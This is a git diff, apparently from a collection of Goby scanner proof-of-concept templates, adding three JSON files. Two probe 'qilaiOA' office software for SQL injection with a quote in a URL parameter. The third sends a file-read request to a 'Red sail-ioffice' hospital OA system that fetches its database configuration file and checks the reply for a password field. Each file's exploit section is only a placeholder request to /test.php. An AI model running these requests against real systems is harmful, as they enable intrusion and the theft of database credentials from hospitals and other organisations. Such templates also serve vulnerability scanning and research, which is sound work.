+{
+ "Name": "qilaiOA messageurl.aspx SQLinjection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "header=\"Server\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/client/messageurl.aspx?user='",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "messageurl",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-11 22:46:07",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/qilaiOA_treelist.aspx_SQLinjection.json b/goby_pocs/qilaiOA_treelist.aspx_SQLinjection.json
new file mode 100644
index 0000000..79c698f
--- /dev/null
+++ b/goby_pocs/qilaiOA_treelist.aspx_SQLinjection.json
@@ -0,0 +1,102 @@
+{
+ "Name": "qilaiOA treelist.aspx SQLinjection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "header=\"Server\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/client/treelist.aspx?user='",
+ "follow_redirect": true,
+ "header": {
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+ "Accept-Encoding": "gzip, deflate"
+ },
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "treelist",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-11 22:36:19",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/red_fan_OA_hospital_ioFileExport.aspx_file_read.json b/goby_pocs/red_fan_OA_hospital_ioFileExport.aspx_file_read.json
new file mode 100644
index 0000000..0f22b64
--- /dev/null
+++ b/goby_pocs/red_fan_OA_hospital_ioFileExport.aspx_file_read.json
@@ -0,0 +1,99 @@
+{
+ "Name": "Red sail-ioffice OA hospital ioFileExport.aspx file read",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "app=\"Red sail-ioffice\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/iODbSet.config&filename=iODbSet.config&ContentType=application/octet-stream",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "pwd",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-15 22:45:45",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file